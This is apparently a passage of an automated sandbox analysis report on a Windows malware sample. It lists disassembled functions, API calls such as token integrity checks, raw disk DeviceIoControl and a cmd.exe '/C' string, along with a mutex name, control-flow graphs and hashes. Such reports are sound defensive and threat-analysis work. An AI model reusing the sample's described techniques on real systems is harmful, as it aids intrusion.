                                                                                                                                                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000040,000001F4,?,0040C145,004046B5,?,00401BD7), ref: 0040E5E5
                                                                                                                                                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000040,000000FC,?,0040C145,004046B5,?,00401BD7), ref: 0040E5F7
                                                                                                                                                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000040,00000400,?,0040C145,004046B5,?,00401BD7), ref: 0040E609
                                                                                                                                                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000040,00010000,?,0040C145,004046B5,?,00401BD7), ref: 0040E61B
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000010.00000002.2461846075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2461792329.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2462076870.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2462205844.0000000000413000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2462347518.000000000046E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_93B.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: AllocLocal
                                                                                                                                                                                                                                                                                                                                                                  • String ID: @j$H/k$Pok
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 3494564517-2682762538
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 65ac8032e033309efcc9f8c0d48804f40c42494c7e65b2be43682c95c20d6d53
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 884c2741ace77f4595bd006b1489b08cdeecc1dacb1c364e852769e485284a96
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 65ac8032e033309efcc9f8c0d48804f40c42494c7e65b2be43682c95c20d6d53
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 44213CB4A41300AFF354AF65AC56B743AA0F708B59F108035FB89A63E0F6F455858E5F
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00405C4C Relevance: 12.1, APIs: 8, Instructions: 78memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00401244
                                                                                                                                                                                                                                                                                                                                                                  • LocalFree.KERNEL32(00000000), ref: 00403BD3
                                                                                                                                                                                                                                                                                                                                                                  • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,00000000), ref: 00407A5F
                                                                                                                                                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000000,00000000), ref: 00407A6B
                                                                                                                                                                                                                                                                                                                                                                  • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,00000000), ref: 00407A86
                                                                                                                                                                                                                                                                                                                                                                  • OpenProcessToken.ADVAPI32(000000FF,00000008,00000000), ref: 00409C94
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000010.00000002.2461846075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2461792329.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2462076870.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2462205844.0000000000413000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2462347518.000000000046E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_93B.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Token$InformationLocal$AllocChangeCloseFindFreeNotificationOpenProcess
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2854556994-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 2fabac034638274b2c3e67be2bc06953f5cdff95292f6c9f39c7e9c359d166b0
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 2e4b4cc31351ce880421fb230fd6ac05725b6f10eb8191371f756e524e2f733f
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2fabac034638274b2c3e67be2bc06953f5cdff95292f6c9f39c7e9c359d166b0
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: ED313CB4A04208FFDB14CFD4C948BAEBBF8AB48301F1081AAE511B72D4D774AB04DB65
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00404369 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 59COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000105), ref: 00404380
                                                                                                                                                                                                                                                                                                                                                                  • CoInitialize.OLE32(00000000), ref: 00404388
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00409543: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409574
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00409543: NtAllocateVirtualMemory.NTDLL(000000FF,0046C2D0,00000000,00001000,00003000,00000004), ref: 004095E1
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00409543: EnterCriticalSection.KERNEL32(DB51E8EC), ref: 00409610
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00409543: RtlInitUnicodeString.NTDLL(00000180,00520000), ref: 00409626
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00409543: RtlInitUnicodeString.NTDLL(00000178,00520000), ref: 0040963C
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00409543: LeaveCriticalSection.KERNEL32(DB51E8EC), ref: 00409649
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00409543: LdrEnumerateLoadedModules.NTDLL(00000000,004050A2,00404393), ref: 0040965A
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00405C4C: FindCloseChangeNotification.KERNELBASE(00000000), ref: 00401244
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00405C4C: LocalFree.KERNEL32(00000000), ref: 00403BD3
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00405C4C: OpenProcessToken.ADVAPI32(000000FF,00000008,00000000), ref: 00409C94
                                                                                                                                                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 0040A945
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000010.00000002.2461846075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2461792329.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2462076870.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2462205844.0000000000413000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2462347518.000000000046E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_93B.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: CriticalInitProcessSectionStringUnicode$AllocateChangeCloseDirectoryEnterEnumerateExitFileFindFreeInitializeLeaveLoadedLocalMemoryModuleModulesNameNotificationOpenTokenVirtualWindows
                                                                                                                                                                                                                                                                                                                                                                  • String ID: %systemroot%\system32\cmd.exe$/C
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 41577365-3057154508
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: a438ef9f5f25d9aebddb8c854ded96209a6b7bafee1d22157f4d592698697d9c
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 7b01f62542bec0b1d87828faea97dd6a3c55c304531570e4c9315d46f9a50642
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a438ef9f5f25d9aebddb8c854ded96209a6b7bafee1d22157f4d592698697d9c
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9411ABB290430866D710BB60EC47FDE73299B54705F0045BBB709B50C2ED7997D88EAE
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00407AB9 Relevance: 6.1, APIs: 4, Instructions: 59memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                                                  control_flow_graph 84 407ab9-407abc 85 407a69-407a8e LocalAlloc GetTokenInformation 84->85 86 407abe 84->86 88 407a94 85->88 89 40103c-40106b GetSidSubAuthorityCount GetSidSubAuthority 85->89 87 407abf-407ad2 86->87 93 408020-408024 87->93 94 407ad8-407afe call 4055b9 87->94 90 401236-40123a 88->90 91 401071 89->91 92 409c8c-409c9c OpenProcessToken 89->92 99 401240-40124a FindCloseChangeNotification 90->99 100 403bc5-403bc9 90->100 91->90 97 407a51-407a68 GetTokenInformation 92->97 98 409ca2 92->98 95 401ea5-401eb9 93->95 96 40802a-408031 93->96 109 407b04-407b0a 94->109 110 4059ea 94->110 104 402035-40203e 95->104 105 401ebf-401ed3 95->105 102 408037-408039 96->102 103 4021ce 96->103 97->85 98->90 99->100 106 40294f-402955 100->106 107 403bcf-403bd9 LocalFree 100->107 111 403d6f-403d72 102->111 103->111 112 4045e8-4045fb 104->112 105->104 113 401ed9-401ee0 105->113 107->106 109->93 110->87 115 404601-404621 call 4055b9 call 40b8c1 112->115 116 409bce-409beb call 40c187 call 40dcf9 call 40ce09 112->116 113->104 114 401ee6-401ee8 113->114 114->111 125 40b344 115->125 126 404627-40462e 115->126 132 409bf1-409bf3 116->132 133 4024fe-40250e call 40dcf9 116->133 125->112 126->125 128 404634-40463e 126->128 130 404644-40464b 128->130 131 40cc1b-40cc25 128->131 134 404651 130->134 135 409ca7-40a398 130->135 136 40cc2b-40cc32 131->136 137 40997f-409986 131->137 132->111 133->111 134->131 135->125 143 40a39e-40a3b3 135->143 136->135 139 40cc38 136->139 137->125 140 40998c 137->140 139->137 140->135 144 40a3b6 143->144 144->144
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00401244
                                                                                                                                                                                                                                                                                                                                                                  • LocalFree.KERNEL32(00000000), ref: 00403BD3
                                                                                                                                                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000000,00000000), ref: 00407A6B
                                                                                                                                                                                                                                                                                                                                                                  • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,00000000), ref: 00407A86
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000010.00000002.2461846075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2461792329.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2462076870.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2462205844.0000000000413000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2462347518.000000000046E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_93B.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Local$AllocChangeCloseFindFreeInformationNotificationToken
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2094194634-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: dfd389ba0a6e21506ee3ce54b84a7e53c4fc79e48b909ed38b184a154f02c170
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 8c14f008afbfcab52b1f24e0be9b5b67c8a06fc3440972dff98bedf792b56cd5
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dfd389ba0a6e21506ee3ce54b84a7e53c4fc79e48b909ed38b184a154f02c170
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2E215E74D04208EFCB04CFE4C959AEEBBB5AB08305F1480AAE505B7394C7746B40DF29
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00403AEE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15synchronizationCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                                                  control_flow_graph 145 403aee-403b11 CreateMutexW GetLastError 146 403b17 145->146 147 403e7a 145->147 146->147
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • CreateMutexW.KERNELBASE(00000000,00000000,jmuZVxzUSQKZJ,?,?,004044C1,?,?,004046B5), ref: 00403AFB
                                                                                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,004044C1,?,?,004046B5), ref: 00403B06
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000010.00000002.2461846075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2461792329.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2462076870.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2462205844.0000000000413000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2462347518.000000000046E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_93B.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: CreateErrorLastMutex
                                                                                                                                                                                                                                                                                                                                                                  • String ID: jmuZVxzUSQKZJ
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1925916568-1615886713
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 97f4a8950689e7290d3bb4c401befd14a09affdda078bd002e7cbc94f52d7475
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 0594eaefbf50b0c8ed9c9a89b72dfe51cd43608961eacb7f94053228cce8ae52
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 97f4a8950689e7290d3bb4c401befd14a09affdda078bd002e7cbc94f52d7475
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 32D017B044A304FAE3008F50DE4DB587EA4EB10702F208036E2026A2D4E3F85A45564A
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00403072 Relevance: 4.6, APIs: 3, Instructions: 81fileCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                                                  control_flow_graph 148 403072-4030ac call 40895b CreateFileA 151 4030b2-4030b4 148->151 152 40880d-408832 DeviceIoControl 148->152 153 40c393-40c396 151->153 154 409e38-409e72 call 40572b call 40bdea call 401314 152->154 155 408838-40883a 152->155 162 409e78-409e7a 154->162 163 40bcde-40bcfa call 40d5c6 154->163 155->153 162->153 166 40bd00-40bd0a 163->166 167 403d94-403d9b call 40acfc 163->167 169 40bd10-40bd2e 166->169 170 40cbf2-40cbf4 166->170 172 403da1-403da3 167->172 173 40c213-40c225 FindCloseChangeNotification 167->173 169->167 170->153 172->153 173->153
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040895B: FindCloseChangeNotification.KERNELBASE(?), ref: 004047E4
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040895B: CreateFileA.KERNELBASE(\\.\C:,00000000,00000003,00000000,00000003,00000000,00000000), ref: 00408972
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040895B: DeviceIoControl.KERNELBASE(?,00560000,00000000,00000000,?,00000020,?,00000000), ref: 00408994
                                                                                                                                                                                                                                                                                                                                                                  • CreateFileA.KERNELBASE(?,C0000000,00000003,00000000,00000003,30000080,00000000), ref: 0040309A
                                                                                                                                                                                                                                                                                                                                                                  • DeviceIoControl.KERNELBASE(000001F4,0007405C,00000000,00000000,0046CB60,00000008,?,00000000), ref: 0040882A
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000010.00000002.2461846075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2461792329.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2462076870.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2462205844.0000000000413000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2462347518.000000000046E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_93B.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: ControlCreateDeviceFile$ChangeCloseFindNotification
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 678468364-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: f40e64bbfca4cb1d53614c19df2d38540b9dd2651b1b1209df5de0d054ee8c58
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: a0e7df79db3949de73361334ad2b5bb9c35e9f163141fb49d4e1771874b744e5
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f40e64bbfca4cb1d53614c19df2d38540b9dd2651b1b1209df5de0d054ee8c58
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FB317574F50201EBD750DB61FDC2B663364A704B08F10863AE985A62E0F7B8A5029F6F
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00403923 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 23memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                                                  control_flow_graph 228 403923-40395d LocalAlloc
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • LocalAlloc.KERNELBASE(00000040,00000000,0040234A,00000000), ref: 0040393C
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000010.00000002.2461846075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2461792329.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2462076870.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2462205844.0000000000413000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2462347518.000000000046E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_93B.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: AllocLocal
                                                                                                                                                                                                                                                                                                                                                                  • String ID: J#@
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 3494564517-1245308917
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 19467080a526decec66838046e26b9bb124c136d8231779d530f3707eec05e2f
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 96f7a68253a7caa59ed99d58a6af94cef16a1ec6a7eb00646cb3d5ddcbfd36b8
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 19467080a526decec66838046e26b9bb124c136d8231779d530f3707eec05e2f
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B8F09BB8E04208EFCB04DF88D68189DFBF5EB48310F2081A9E948A7340D630AE41DB95
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 0040B485 Relevance: 1.6, APIs: 1, Instructions: 133COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • DeviceIoControl.KERNELBASE(000001F4,0004D004,?,00000000,?,00000000,00000000,00000000), ref: 0040B613
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000010.00000002.2461846075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2461792329.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2462076870.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2462205844.0000000000413000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2462347518.000000000046E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_93B.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: ControlDevice
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2352790924-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 61738139d7721975275484778ac13903525e9063b07367c5274bb8a2ff343b39
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 955b2810cad582ab64bab9f2fc00926d3d94ddd31486b38c3d76b0e6824925a9
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 61738139d7721975275484778ac13903525e9063b07367c5274bb8a2ff343b39
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CF514975A00208EFEB04CF98C591B9EBBB1EF94304F2881E9D9006B386C675EF41DB91
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 0040CCC4 Relevance: 1.6, APIs: 1, Instructions: 132COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000010.00000002.2461846075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2461792329.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2462076870.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2462205844.0000000000413000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2462347518.000000000046E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_93B.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 52feb7105ccc154861b194a815cc79ff19998883af9ca8cb1e6121868c2185b6
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: b0a1cca4c76cdf7f661d8f2e5d02ec42dbbd4e19700d0716b40d81d1197e7497
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 52feb7105ccc154861b194a815cc79ff19998883af9ca8cb1e6121868c2185b6
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A6513975A00108EFDB08CF98C594B9EBBB1EB94304F2481A9E9056B3C2C775EF41DB91
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

